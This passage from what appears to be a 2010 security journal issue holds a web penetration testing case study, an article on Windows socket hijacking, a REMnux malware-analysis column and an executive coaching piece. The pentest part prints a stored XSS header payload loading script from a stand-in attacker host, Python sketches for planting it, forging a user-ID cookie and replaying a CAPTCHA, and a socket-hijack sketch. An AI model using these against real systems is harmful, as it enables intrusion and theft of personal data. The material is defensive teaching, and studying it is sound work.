function isAuthenticated(arg0:Function, arg1:Function);

function authenticateUser(arg0:String, arg1:String, arg2:Function, arg3:Function);

function validateUser(arg0:String, arg1:Function, arg2:Function);

function listAllUsers(arg0:Function, arg1:Function);

function listAllImages(arg0:Function, arg1:Function);

function registerUser(arg0:String, arg1:String, arg2:String, arg3:String, arg4:String, arg5:Boolean, arg6:Boolean, arg7:Function, arg8:Function);

function listFeaturedImages(arg0:Function, arg1:Function);

... }

Not all of these functions were used by the client, most notably the function listAllUsers. This function was tested outside of the Flash client by using a handy Python module, pyAMF. The gateway ASP.NET page was specified along with the ListAllUsers service called by the function, resulting in three lines of Python code:

from pyamf.remoting.client import RemotingService

gateway = RemotingService('http://localhost/amf/gateway.aspx')

print gateway.getService('WebsiteSixService.ListAllUsers')()

This returned a list with details of all the registered users, including names, postcodes, email addresses, password hashes, and password salts. The impact of this was that all personal details in the registration database were exposed. The attacker can try to brute-force the passwords, but even without them, the attacker has an excellent opportunity for social engineering with the personal details and with the knowledge that those people have registered on this website.

A Flash client that communicates with the web server sometimes uses an interface that may be shared with other system components. This interface may expose administration-only methods, such as those listed above. Although a good scanner may find links in Flash code, a scanner would not currently determine custom web service method calls. Finding and checking these requires a tester to decompile the Flash client and look for web service calls in the code. SWF Scan is excellent for that.

Stored cross-site scripting

Many websites have an administration backend available on the public website, commonly at /admin. One of the company’s websites had an administration backend that could be found using a directory guessing tool. A great tool for this is DirBuster. This particular website’s administration backend was in the directory /SiteAdmin. The user registrations could be listed here. An administrator who logged in to the administration area and clicked on a particular registration was shown the registration details, including the registered user’s web browser details. These browser details are supplied to the web server by the browser in the User-Agent header. Why the administrator needed to see the registered user’s web browser details in this case was not clear, but this header and other headers such as the referrer are occasionally shown. Here’s an example, which can be viewed by using the Live HTTP Headers add-on for Firefox.

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)

The User-Agent in the browser web request can be changed by using a tool such as the Tamper Data Firefox add-on. Adding a bit of JavaScript to the User-Agent, highlighted below, can determine what impact this may have on the website. In this case, the script was executed when an administrator looked at that user’s registration details, which include the User-Agent of the registered user. An administrator may look at a registered user’s details to verify if it is a legitimate account, or can be prompted to view the details by sending an email saying that there is a problem with the account. Either way, the attacker needs to wait for the administrator to look at that account’s details. This was therefore found to be vulnerable to cross-site scripting. The other registration fields had validation and encoding in place to prevent cross-site scripting, so only this field was vulnerable. The modified User-Agent is as follows.

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)<script src=’http://evilxsshost/js’></script>
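
The same poisoned header can also be planted with a short script rather than a browser add-on; the sketch below uses the Python requests library, and the registration URL and form fields are hypothetical stand-ins for the real site:

import requests

# Only the User-Agent matters here; the endpoint and form fields are hypothetical
payload_ua = (
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.7) "
    "Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)"
    "<script src='http://evilxsshost/js'></script>"
)
requests.post(
    "http://localhost/Register.aspx",
    data={"username": "test", "email": "test@somedomain"},
    headers={"User-Agent": payload_ua},
)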

The impact of this was that someone could have gained access to the administration area, and so been able to steal personal information and deface the website. The XSS Shell tool can demonstrate how this can be done: the script link in the User-Agent field would be the link to the attacker’s XSS Shell script. When the victim viewed the registration details page, his session details would appear on the attacker’s screen. The attacker can then make himself an administrator by plugging the victim’s session cookie into his own browser, for example by using the Web Developer add-on for Firefox.

A web application scanning tool may have found this issue; however, frequently tools are not configured correctly. In this case, the tool would have needed to be configured with authentication for the administration area. This example of stored cross-site scripting in the administration area is a common issue that is missed by scanners. This issue can be found manually by browsing the administration area and seeing what kind of information is presented. Inject script in the areas such as the registration or comment areas; then check to see if it executes when the administrator views it.

User ID in a cookie

One website had a simple registration page for a newsletter. After registration, you could log in and amend your personal details and newsletter preferences. Unusual cookies are always worth a look, where “unusual” means that they are not the usual application framework session cookies. When you logged into this website, the system set an unusual cookie as well as a usual ASP session cookie (viewed by looking at traffic in Fiddler2):

Cookie: ASPSESSIONIDCSTSRBBS=JACLEBJACANIJJABODECJMGE; usession=dWlkOjE3Njg0MTtmbmFtZTp0ZXN0O3NuYW1lOnRlc3Q7ZW1haWw6dGVzdEBzb21lZG9tYWlu

The usession cookie was a base 64 encoded string. Base 64 encoded strings can be recognized by the character set that they use. The usession cookie revealed the following fields when decoded (using the encoder in Fiddler2):

uid:176841;fname:test;sname:test;email:test@somedomain

The uid field looked interesting, as it appeared to represent the logged-in user’s ID. This was changed to a different value close to the old ID, say 176840 or 176839, and then the whole string was re-encoded to base 64. This new usession cookie was then updated in the browser (by using a tool such as the Firefox Web Developer add-on), and the personal details page refreshed. This presented the personal details of another user. The impact of this was to expose the entire registration database, as an attacker could cycle through sequential uid values.
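
A minimal Python sketch of that manipulation, using the usession value shown above:

import base64

usession = ("dWlkOjE3Njg0MTtmbmFtZTp0ZXN0O3NuYW1lOnRlc3Q7"
            "ZW1haWw6dGVzdEBzb21lZG9tYWlu")
decoded = base64.b64decode(usession).decode()
print(decoded)  # uid:176841;fname:test;sname:test;email:test@somedomain

# Swap in a neighboring user ID and re-encode to forge a new usession value
forged = base64.b64encode(decoded.replace("176841", "176840").encode()).decode()
print(forged)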

An identifier in a cookie that can be abused appears occasionally in websites that we test. The example here is encoded and is part of a cookie with other fields. A scanner would not identify this particular vulnerability due to the encoding and field layout. To find this manually, you would need to notice this as a custom cookie that is base 64 encoded. When you decode it, you need to try and see what happens when you change different parts of the cookie, especially any that look suspiciously like a user identifier!

Bypass CAPTCHA

Many of the organization’s websites use CAPTCHA images to hinder automated attacks. These attacks include password guessing, multiple registrations, and automated prize-code checking. CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) images can be weak themselves, and be vulnerable to OCR techniques. There can also be simpler vulnerabilities to exploit with CAPTCHA, as this example demonstrates.

One website relied on the same CAPTCHA function for the user registration process and for the prize-code check. A user needed to register or log in and then enter a prize code, which could be found on the company’s product label. A winning code resulted in the user receiving one of a number of prizes. The number of prize codes a user could enter per day was also limited.

The website used a Flash client to communicate with a web service. The following XML (viewed using Fiddler2) shows how the Flash client passed the prize code to the web service:

https://localhost/WebServices/CheckPrizeCode.asmx

<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://schemas.xmlsoap.org/soap/envelope/">

<soap12:Body>

<CheckPrizeCode xmlns="http://tempuri.org/">

<CaptchaHash>7FLFwNtuq6UgIdE1awgUrQ==</CaptchaHash>

<CaptchaText>K46TPJ</CaptchaText>

<PrizeCode>H1N181430B1G</PrizeCode>

<IPAddress>127.0.0.1</IPAddress>

</CheckPrizeCode>

</soap12:Body>

</soap12:Envelope>

The CaptchaHash and the CaptchaText could be reused in multiple submissions of different PrizeCode values. Retrying CAPTCHAs is a normal step in a penetration test. However, the CaptchaHash parameter stands out as potentially vulnerable: if the server only checks the CaptchaHash against the CaptchaText, what is preventing replay? This made the use of CAPTCHA redundant, as once one set of CaptchaHash and CaptchaText was found, an attacker could use them to try a huge number of prize codes.
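
A minimal sketch of such a replay, again in Python with the requests library; the SOAP body mirrors the request above and only the PrizeCode element changes between submissions, while the candidate codes and the Content-Type header are assumptions (the walk-through does not show the request headers):

import requests

ENDPOINT = "https://localhost/WebServices/CheckPrizeCode.asmx"
TEMPLATE = """<soap12:Envelope xmlns:soap12="http://schemas.xmlsoap.org/soap/envelope/">
  <soap12:Body>
    <CheckPrizeCode xmlns="http://tempuri.org/">
      <CaptchaHash>7FLFwNtuq6UgIdE1awgUrQ==</CaptchaHash>
      <CaptchaText>K46TPJ</CaptchaText>
      <PrizeCode>{code}</PrizeCode>
      <IPAddress>127.0.0.1</IPAddress>
    </CheckPrizeCode>
  </soap12:Body>
</soap12:Envelope>"""

# One solved CAPTCHA is replayed for every guess; the codes below are made up
for code in ["H1N181430B1G", "H1N181430B2G", "H1N181430B3G"]:
    resp = requests.post(ENDPOINT, data=TEMPLATE.format(code=code),
                         headers={"Content-Type": "application/soap+xml"},
                         verify=False)  # self-signed certificates are common in test environments
    print(code, resp.status_code)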

The impact was that someone wishing to abuse the competition could automate the creation of multiple registrations and use those to automate multiple prize-code checks. In practice the likelihood of this succeeding and prizes being won was fairly low, due to the size of the prize-code key space; it may still, however, have resulted in adverse publicity. It could also have prevented someone from claiming a prize legitimately if the prize code had already been claimed.

Many of the CAPTCHA-protected websites we have tested have implementation problems that render the CAPTCHA ineffective. A scanner will have problems with CAPTCHAs, as by their nature they are designed to prevent automated attacks. A tester should examine the communication between the browser and server to see how the CAPTCHA works. This will suggest avenues for attacking it.

Summary

Manual web-application penetration testing is certainly not a panacea for securing applications; however, it can find serious security issues that a web-application scanning tool will miss. These vulnerabilities will primarily be logical vulnerabilities as opposed to technical vulnerabilities; however, technical vulnerabilities are also often not found by scanning tools, especially certain blind SQL injection and stored cross-site scripting issues.

As with functional testing, scanning tools are used alongside manual testing to help make the process more efficient. As with any tool, application vulnerability scanning tools need proper configuration and an awareness of security issues to ensure good website code coverage and discovery of issues.

Although many organizations do have security testing in their software development project process, many still treat this as an afterthought, or even wait until the site has gone live before security testing. Having security testing built into the project plan, with a contingency to fix any vulnerabilities discovered, will greatly improve the chance of the website going live on the planned launch date.

If serious security flaws are picked up by scanners or penetration testing, this indicates that the application design and development process can be improved. If you find scanners or penetration tests are picking up flaws on a regular basis, you would certainly benefit from requiring that in-house developers or third-party software companies follow secure development practices, such as the OWASP Development Guide.

References

—Web Application Vulnerability Scanners – http://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools.

—“OWASP Testing Guide v3” – http://www.owasp.org/index.php/Category:OWASP_Testing_Project#OWASP_Testing_Guide_v3_2.

—“OWASP Development Guide 2.0.1” – http://www.owasp.org/index.php/Category:OWASP_Guide_Project#tab=Download.

—“Web application security: automated scanning versus manual penetration testing,” Danny Allan, strategic research analyst, IBM Software Group – ftp://ftp.software.ibm.com/software/rational/web/whitepapers/r_wp_autoscan.pdf.

Tools

—DirBuster – http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project.

—Live HTTP Headers add-on for Firefox – https://addons.mozilla.org/en-US/firefox/addon/3829.

—Web Developer add-on for Firefox – https://addons.mozilla.org/en-US/firefox/addon/60.

—Tamper Data add-on for Firefox – https://addons.mozilla.org/en-US/firefox/addon/966.

—XSS Shell – http://labs.portcullis.co.uk/application/xssshell.

—HP SWF Scan – http://www.communities.hp.com/securitysoftware.

—pyAMF – http://pyamf.org.

—Burp – http://portswigger.net/proxy.

—Fiddler2 – http://www.fiddler2.com.

About the Author

Bil Bragg, CISSP, is a penetration tester and ISO 27001 lead auditor at Dionach Ltd. Contact him at bil.bragg@dionach.com.

 

 

Socket Hijacking

By Neelay S. Shah and Rudolph Araujo

 

In this article the authors discuss the socket hijacking vulnerability on Windows, the impact of the vulnerability, and what it takes to successfully exploit the vulnerability. They also review existing mitigating factors, the cause of the vulnerability as well as its remediation.

 

Abstract 

Sockets are one of the most widely used inter-process communication primitives for client-server applications due to a combination of the following factors. Sockets:

·      Allow for bi-directional communication

·      Allow processes to communicate across the network

·      Are supported by most operating systems

What application developers need to be aware of is that attackers can target these same client-server applications by “hijacking” the server socket. Insecurely bound server sockets allow an attacker to bind his own socket on the same port, gaining control of the client connections and ultimately allowing the attacker to steal sensitive application-user information as well as launch denial of service attacks against the application server. In this article we discuss the socket hijacking vulnerability on Windows, the impact of the vulnerability, and what it takes to successfully exploit the vulnerability. We also review existing mitigating factors, the cause of the vulnerability, and its remediation. This article is intended for all software developers, architects, testers, and system administrators. Foundstone has released a free tool, Foundstone Socket Security Auditor,[22] which identifies the insecurely bound sockets on the local system.

 

Sockets are identified by an IP address and port number. Port numbers can be in the range of 0 to 65535, whereas the IP address can be any of the underlying IP addresses associated with the system, including the loopback address. The socket library also supports a wildcard IP address (INADDR_ANY) that binds the socket to the specified port on all underlying IP addresses associated with the system. This feature is extremely attractive (and hence widely used) from an application development point of view for the following reasons:

·      The application developer does not need to write code to programmatically enumerate the underlying IP addresses (associated with the system) and then use one or more of them to bind the listening server socket.

·       In scenarios where the server has multiple network routable IP addresses, there is no additional overhead needed for exchanging the server’s listening IP address with the client. The client could use any one of the server’s network routable addresses and connect successfully to the server (Figure 1).

However, it is possible to bind more than one socket to the same port. For instance, there could be an application server with a listening socket bound to INADDR_ANY:9000 and another malicious application server with its listening socket bound to 172.23.20.110:9000.[23] Note that both applications are running on the same system; the only difference (as far as their listener sockets are concerned) is the binding of the listener socket. The legitimate application server has bound its listening socket to the wildcard IP address (INADDR_ANY), whereas the malicious application server has bound its listening socket to a specific IP address (172.23.20.110).

When the client initiates a connection to the server, the client needs to use the routable address (172.23.20.110) and the port (9000) to connect to the server. When the connection request reaches the server, it is the responsibility of the network stack on the server to forward the connection to the listener. Now there are two sockets listening on the same port (9000), and the network stack can forward the connection to only one of the listening sockets. Thus, the network stack needs to resolve this conflict and choose one of the two sockets to forward the connection to.

For this, the network stack inspects the incoming client request which is targeted for 172.23.20.110:9000. Based on this information, the network stack resolves in favor of the malicious application since it had bound its listening socket specifically on 172.23.20.110. Thus the malicious application gets the client connection and can communicate further with the client. This is referred to as Socket Hijacking, i.e., the malicious application has successfully hijacked the legitimate application’s listener socket. Figure 2 illustrates the client-server communication setup in the event of socket hijacking.
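
A minimal sketch of the hijack from the malicious application’s side, using Python’s socket module; the address and port are the hypothetical values used above, and the legitimate server is assumed to have already bound INADDR_ANY:9000 without any exclusive-use protection (the Windows behavior described in this article):

import socket

# Bind the same port on a specific local address; the network stack prefers
# this more specific binding when clients connect to 172.23.20.110:9000.
hijacker = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
hijacker.bind(("172.23.20.110", 9000))
hijacker.listen(5)

conn, addr = hijacker.accept()  # receives a connection meant for the real server
print("hijacked connection from", addr)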

Impact of the vulnerability 

Now that we understand and have discussed socket hijacking in detail, let’s turn our focus towards the impact of the socket hijacking vulnerability; in other words, what damage can an attacker do by exploiting it?

Hijacking the listener socket of the legitimate server essentially allows the attacker to set up a spoofed server and hijack client connections without having to tamper with the client application in any way, i.e., the client application still connects to the same IP address and port as before; however, the attacker gets hold of the client connection. Having received the client connection, the attacker will then be in a position to carry out much more damaging things such as:

·      Information Disclosure – Depending on the transport security primitives and the actions the client and the server carry out, based on the messages on the socket, the attacker could gain knowledge of sensitive data such as user credentials and even launch man-in-the-middle attacks.

·      Denial of Service – The real server has no notification of the client connection and as such the attacker would be successful in causing denial of service to legitimate client(s).

Exploiting the vulnerability 

So the next question is: “What does the attacker need in order to successfully exploit this vulnerability?” Following are the key considerations and the mitigating factors with respect to successful exploitation of this vulnerability.

·      The attacker needs to have sufficient access to the system with the vulnerable application. The attacker does not need to have privileged access but needs to be able to execute his malicious application on the system.

·      On Windows Server 2003 and later a default ACL is applied to all sockets and as such a limited rights user cannot hijack a socket opened by a different user unless the application explicitly used an insecure ACL while creating the socket.

·      Ports 0-1023 are privileged ports on Windows XP SP2 and later. On these operating systems, the attacker would need administrator/super-user privileges to hijack sockets which are bound to ports in the range 0-1023.

Identifying the vulnerability 

The vulnerability is introduced by binding the socket insecurely. Let us look at the signature of an insecure invocation of the “bind” API, which is used to bind the socket to the underlying IP address and port. Since the socket is bound to the wildcard IP address (INADDR_ANY), this code snippet is susceptible to “socket hijacking” on Windows:

SOCKET sListener = ::socket(AF_INET, SOCK_STREAM, 0);

//Check for error return code

sockaddr_in service;

service.sin_family = AF_INET;
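
//Binding to the wildcard address (INADDR_ANY) is what makes this socket
//hijackable: a second socket bound to the same port on a specific local IP
//address will receive the connections destined for that address.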

service.sin_addr.S_un.S_addr = ::htonl(INADDR_ANY);

service.sin_port = htons(9000);

int iRet = ::bind(sListener, (sockaddr*) &service, sizeof(service));

//Check for error return code

About the Authors

Neelay S. Shah is a senior software security consultant at Foundstone Professional Services. Rudolph Araujo is a technical director at Foundstone Professional Services. Questions or comments may be directed to consulting@foundstone.com.

 

Columns

 

toolsmith

REMnux

By Russ McRee – ISSA member, Puget Sound (Seattle), USA Chapter

 

Prerequisites

Virtualization platform – VMWare, VirtualBox, etc.

One skill I believe is a core requirement for a well-rounded incident response team is malware analysis. You or your associates may not possess deep reverse engineering talents, but I firmly believe you should know how to use certain tools of the trade and interpret the results effectively.

REMnux is intended to provide a collection of tools that can get you started, both as an aid while you learn and enhance your malware analysis capability and as part of your regular toolkit.

Lenny Zeltser developed REMnux for his SANS Reverse-Engineering Malware course,[24] where he uses it as he teaches malware analysis.

When I queried Lenny for this article, he indicated that he finds REMnux particularly useful for analyzing malicious software in two primary use cases.

First, the malware analyst infects a Windows system in a lab and uses REMnux to run services that malware looks for, such as HTTP, SMTP, and IRC. To meet this requirement, REMnux includes tools such as TinyHTTPd, fakesmtp, and InspIRCd, as well as Wireshark, fakedns, and honeyd.

The second use case includes using REMnux to directly analyze malware in the form of malicious browser scripts, Flash and PDF files, and more. For this, REMnux includes a customized version of SpiderMonkey, jsunpack-n, the Origami framework, Didier Stevens’ PDF tools, and Flash decompilers.

Lenny prefers reverse-engineering Windows executables on Windows hosts rather than on *nix, which is why REMnux doesn’t include Wine. I share Lenny’s preference; you’ve read endless toolsmith columns where I’ve made use of a compromised Windows XP virtual machine. However, REMnux includes GDB, objdump, and Radare to help with shellcode analysis.

Finally, REMnux also includes tools useful for memory forensics, such as the Volatility Framework and some excellent malware-related plug-ins for it.

Lenny considers REMnux a work in progress and maintains a “to-do” list of additional tools he’d like to add based on feedback from REMnux users.

He hopes to have an update released in late fall of 2010.

REMnux is meant to be lightweight to allow it to run successfully on hardware that may be a bit dated or that doesn’t include a lot of RAM. To that end it uses Enlightenment as the X window manager, rather than GNOME or KDE. REMnux is built on Ubuntu so you can add any tool you wish using apt-get.

If you wish to incorporate the GNOME desktop, ensure that REMnux can connect to the Internet; then simply run sudo apt-get install ubuntu-desktop with the understanding that 1GB worth of files will be downloaded as a result (nullifying the premise of lightweight ;-)).

I challenge you to make do with the terminal as you use REMnux. You can hone your *nix and malware analysis skills at the same time.

Lightweight also implies that REMnux doesn’t include every single malware analysis tool. The goal is to have the tools the community considers most useful, so that people who are just entering the field of malware analysis have a strong starting point for building and customizing their lab.

Don’t be discouraged when you log onto REMnux and simply see a command shell. Lenny’s goals include the addition of some hints and shortcuts directly into the interface in the next revision.

In the interim I intend to give you some good starting points and you can certainly learn more about the tools installed on REMnux and find additional getting-started hints at the REMnux website.[25]

REMnux configuration

A few immediately useful tips culled from the REMnux site.

You’ll likely want to make use of the SSH server as the easiest method for moving samples and results data to and from your REMnux VM. The commands sshd start and sshd stop will work as expected, but you may need to generate missing keys if you built from the ISO rather than using the available VM appliance:

sudo ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N ''

sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N ''

REMnux will automatically pull an IP address as a DHCP client; ifconfig or myip will reveal your address. To reacquire your network configuration, use restart-network.

I’ve taken to using Oracle’s VirtualBox for quick, straightforward virtualization. As such I downloaded the REMnux ISO, booted from it, and took a preliminary snapshot. Remember to take another one after you’ve tweaked REMnux to your liking. If you’re using VMWare, simply download the appliance and you’re good to go.

If you wish to work from Enlightenment (the X window manager), simply execute startx after the VM is fully initialized.

REMnux for services

When you really don’t want malware to phone home via your Internet provider, but you want it to believe it has every capability to do so, fakedns is useful for trapping DNS lookups. A “minimal Python DNS server,” fakedns is as simple as running sudo fakedns. Remember to point your Windows-based malware analysis VM’s DNS setting to the REMnux IP address.

If you’d like to interact with IRC-based malware, utilize InspIRCd via ircd start.

Your best bet is the really slick little services simulation suite found in INetSim. You’ll have to edit the config file before it will play nicely, but here’s how. Remember, if you choose to use INetSim for services, kill fakedns so there is no contention for port 53.

Execute sudo vi /etc/inetsim/inetsim.conf and modify service_bind_address to match the IP address your VM is configured with. Repeat this step for dns_default_ip.

Thereafter, run sudo inetsim and let loose some badness on your Windows malware VM (remember to point DNS accordingly).

INetSim writes to /var/log/inetsim by default, including /var/log/inetsim/service.log for captured service activity. Figure 2 shows a brief INetSim log snippet captured after I stomped on a variety of malicious binaries on a Windows VM configured as 192.168.248.113.

Note the entries in Figure 3 where 192.168.248.113 makes a DNS request for www.partizangroup.net then shortly thereafter phones home via port 80. A quick search engine query for partizangroup.net reveals that it was an active malware domain in 2008, added to the DNS-BH (Black Hole DNS Sinkhole).

INetSim writes HTTP POST data to /var/lib/inetsim/http/postdata/. After running sudo cat /var/lib/inetsim/http/postdata/7db070cbb57a0a814a67caf0132ef4299cd30032 > inetsimPOST.txt as seen in Figure 3, I grabbed the output and dropped it into a URL decoder.

What was

praquem=nadielepf%40terra%2Ecom%2Ebr&titulo=HIO%2D66ZKDGUCPVW+Foi+infectado+%3AD&texto=Computador+%2E%2E%2E%2E%3A+HIO%2D66ZKDGUCPVW+00%2D0C%2D29%2D56%2D54%2D89%0D%0AData+%2E%2E%2E%2E%2E%2E%2E%2E%2E%2E%3A+8%2F22%2F2010%0D%0AHora+%2E%2E%2E%2E%2E%2E%2E%2E%2E%2E%3A+9%3A34%3A30+PM%0D%0A&

became

praquem=nadielepf@terra.com.br&titulo=HIO-66ZKDGUCPVW Foi infectado :D&texto=Computador ....: HIO-66ZKDGUCPVW 00-0C-29-56-54-89

Data ..........: 8/22/2010

Hora ..........: 9:34:30 PM

What would have been an email phone home to the bot herder who owned nadielepf@terra.com.br a couple of years ago was neatly captured by INetSim.
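
If you would rather not paste captured data into a web-based decoder, Python on the REMnux VM can do the same decoding locally. A minimal sketch, assuming Python 2 (as shipped at the time) and the inetsimPOST.txt file created above:

python -c "import urllib; print urllib.unquote_plus(open('inetsimPOST.txt').read())"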

REMnux for direct analysis

One of my teammates recently handled an incident that initially looked like a DoS attack, as the requests to the service were excessive to the point of causing latency and service degradation.

The GET request was clearly not known-good for one of our services, and weirder still, the referrer was a URL identifying a GIF file.

GET /fcg-bin/cgi_emotion_list.fcg?uin=454682113&loginuin=&s=&.swf HTTP/1.1

Accept: */*

Accept-Language: zh-CN

Referer: http://img.qqywf.com/logo.gif

Downloading logo.gif to my REMnux VM presented an excellent opportunity to test certain static executable and binary analysis tools included with REMnux.

First, as I suspected that logo.gif was not actually a GIF, I used TrID,[26] a utility designed to identify file types from their binary signatures.

Executing trid logo.gif yielded Figure 4.

Ah, so having confirmed a Flash file, I moved to the Flash tools available, including swftools, flasm, and flare. After renaming logo.gif to logo.swf, I ran flasm logo.swf. Flasm disassembles SWF files, including all the timelines and events. Note: keep in mind that flasm doesn’t support ActionScript 3. Lenny only included flasm because of its convenient flasm -x feature to decompress SWF files. For disassembling files, it’s better to use swfdump -Ddu instead.

The results are written to an output file; in this case logo.flm. Scrolling through the results via cat, I found: http://g.qzone.qq.com/fcg-bin/cgi_emotion_list.fcg?uin=454682113&loginuin=&s=&.swf
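
Rather than scrolling through the entire disassembly, you can also pull URL references straight out of the output file; a quick sketch along these lines will do:

grep -i http logo.flm     # show only the lines referencing URLs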

This closed the loop on what was happening. The initial GET request to our service included /fcg-bin/cgi_emotion_list.fcg?uin=454682113&loginuin=&s=&.swf as noted above, but it was obviously resulting in a 404 error, as the requested resource was located on http://g.qzone.qq.com. Misconfiguration or intentional? Hard to say, but we black holed it given the impact to the service.

Malicious PDFs

Malicious PDF analysis is another strong suit of the tool suite included with REMnux.

You will find Jsunpack-n and Didier Stevens’ PDF tools[27] mentioned earlier useful in this regard.

I grabbed a malicious PDF sample from offensivecomputing.net (MD5: a491ae05103849d8797d1fda034e0bd5, readme.pdf) and put it to use on REMnux as follows.

Didier recommends using pdfid.py first to scan for a “given list of strings and count the occurrences (total and obfuscated) of each word.” Jsunpack-n’s pdf.py script would have provided similar functionality.

This list includes /JS and /JavaScript, which, when identified in a PDF sample, most often indicate maliciousness. Running pdfid.py readme.pdf resulted in Figure 5.

With a clear indicator of JavaScript inclusion, you can then use pdf-parser.py to learn further details.
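
A reasonable next step looks something like the following (the object number in the second command is purely illustrative; use whichever objects the search turns up):

pdf-parser.py --search javascript readme.pdf    # locate the objects that reference JavaScript

pdf-parser.py --object 11 --filter readme.pdf   # examine a specific object with its stream filters applied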

The last handy little script we’ll cover here (there are many more for you to discover and test) is Jim Clausing’s packerid.py. Jim indicates that while he likes PEiD,[28] it’s Windows-only. He wanted a script that runs on a *nix OS and uses a PEiD database to identify which packer (if any) is being used by a binary, so he wrote it himself.

It’s as easy as running packerid malware.exe.

The output will either be None or as seen in the following examples:

['ASPack v2.12 -> Alexey Solodovnikov'] (MD5: f7628666adcb35491a925f240f97c634)

['ASProtect v1.23 RC1'] (MD5: 01bcd0d218157ce6c0f596676864833c)

Experiment with bytehist too; it builds byte-usage histograms that help you visually spot encrypted or packed data.

In conclusion

If you’re looking to develop or accentuate your malware analysis skills, REMnux is a great resource. Keep an eye on the project site for the next release, and by all means send feedback to Lenny. Contact him via @lennyzeltser on Twitter or through his website, zeltser.com. If the suggestions are useful, they will be incorporated as appropriate.

There are a number of tools found on REMnux, so don’t hesitate to dig in. Read the project web site along with the reference URLs it provides for each tool; your efforts will be rewarded.

Cheers…until next month.

Acknowledgements

Lenny Zeltser, for REMnux and for championing the cause of teaching malware analysis.

About the Author

Russ McRee, GCIH, GCFA, GPEN, CISSP, is team leader and senior security analyst for Microsoft’s Online Services Security Incident Management team. An advocate of a holistic approach to information security, Russ maintains holisticinfosec.org. Contact him at russ@holisticinfosec.org.

 

 

Security CXO

Invest in Yourself: Hire an Executive Coach

By Joyce Brocaglia

 

As the role of an information security professional continues to diversify and evolve, one thing has become crystal clear. In order for information security officers to be successful, they need to elevate their communication and leadership skills to be on par with those of senior executives across the organization. This may be a challenging task for many information security officers who have risen from technical roles and have received years of technology training but very little personal development and management training. Information security officers are demanding a seat at the table, but from what I’ve witnessed, many of them have very poor table manners! So the question is: how does one go about developing these table manners? There are a variety of possibilities, but the one solution that will provide results that can have a life-altering effect is executive coaching.

Executive coaching is a tool that, if utilized correctly, will not only teach you how to be successful in the context of what an organization needs but will also teach life skills that will allow you to bring your best to the table.

Some companies offer programs for you to engage an executive coach. If your company does not, then you have to decide whether you believe the benefit is worth the investment of your personal funds. Since my guess is that many readers are not offered these services through their employer, I’ll share my knowledge and personal experience to better equip you to make that decision.

My personal experience over the past five years with my executive coach has proved to be both rewarding and enlightening. I consider myself fortunate to have found someone whose opinions I respect and who has provided me with perspectives that I might not otherwise have gained on my own. I found my coach through a recommendation of an executive that I trust who had worked with her.

So how do you go about hiring an executive coach? 

Hiring a coach is truly a matter of buyer beware. Because coaching is currently an unregulated field, there are a ton of people from other disciplines (trainers, consultants, human resources specialists, and even psychologists) who are simply hanging out new shingles and calling themselves coaches.

This is dangerous, because like any other field, coaching has a distinct technology and set of practices that are not learned simply by osmosis. The professional association that serves the field, the International Coach Federation[29] (ICF), has worked hard to establish stringent standards for coaching training programs as well as a rigorous certification process for coaches desiring independent verification of their qualifications. The ICF certifies coaches at the Associate (ACC), Professional (PCC), and Master (MCC) certification levels. There are currently approximately 1200 ICF certified coaches around the world. It is also important for leaders to carefully interview coaches before making hiring decisions to ensure that there is a good match. Coaching involves a technology, but it also involves good chemistry. At the end of the day, coach and client have to be on the same wavelength for it to work.

How is coaching different than the management training you are currently getting at work? Coaching goes well beyond the traditional training and event-based approaches to leadership development that assume that one size fits all and is offered through a course or lecture or takes place over one long weekend. Coaching invites people to look at themselves deeply and holistically, and to develop leadership mastery in the context of their own values, strengths, wants, needs, personal styles, and belief systems. Its benefits unfold and are solidified over a period of time so that it has real-world application. Most importantly, it gets to the core of what really matters and resonates for people, and when you tap into that resource, you release amazing energy for growth and transformation.

One of the things that I found beneficial in understanding my own personality, strengths, and weaknesses was the set of assessments that my coach administered, analyzed, and discussed with me. Assessment tools are simply an additional source of information about a person. As human beings, we all have blind spots, and we do not always see the patterns of our own behavior. Assessments can be useful in helping people to better understand and predict their own tendencies as well as those of others, and to develop effective strategies for responding to those tendencies. To that end, assessments are very useful in the coaching process. They become problematic when people take them too far and use them to label (and thus pigeonhole) themselves or others, or use them as an excuse to justify ineffective behaviors. Assessment results are a valuable source of data, but should not be considered the panacea that will provide all of the answers.

I’ve found that the greatest benefit of working with an executive coach is that not only has the experience helped me with my leadership skills for the businesses I run, it has truly enhanced and changed my outlook, reactions, and thought processes surrounding many events in my personal life. I feel fortunate to have found such a great coach. My best advice to you is to choose wisely! Take the time to ask the people you trust the most if there is someone that they can recommend; you may also speak with your HR and training departments because even if you do not qualify for a coach, they may have someone that they really like. Most importantly have an initial conversation with the coach to understand his or her process, tools, and approach to your coaching relationship. Once you have checked references and credentials, it is really up to your gut to know if this is someone who you feel you can really click with and get value from.

Your relationship with your coach is very personal and unique. If you do not find the right one off the bat, it does not mean that you won’t benefit from a coach; perhaps you have not found one that suits your style best. I know when I was learning to play golf, it took a few pros before I found one who could say things to me in a way that made sense and that I could directly apply to my swing and my game. Others may have given me the same pointers, but for some reason I was able to convert her suggestions into actions I could really do. You need to find a coach who can express ideas and concepts in a way that makes sense to you personally so that you can truly effect change.

About the Author

Joyce Brocaglia is the CEO of Alta Associates, the industry’s trusted advisors specializing in information security recruiting, and the founder of the Executive Women’s Forum (www.ewf-usa.com). Joyce may be reached at www.altaassociates.com and Joyce@altaassociates.com.

 

 

This has been the September 2010 issue of the ISSA Journal.



[1]    Before someone emails me about device vs. user vs. process authentication, I understand this is an oversimplification of a complex process that relies on several perfectly executed human interactions to work. Keys can be compromised and browsers can be hacked.

[2]    Which, depending on the scenario, is not always true. But for the vast majority of the time, it is.

[3]    http://www.trustedcomputinggroup.org.

 

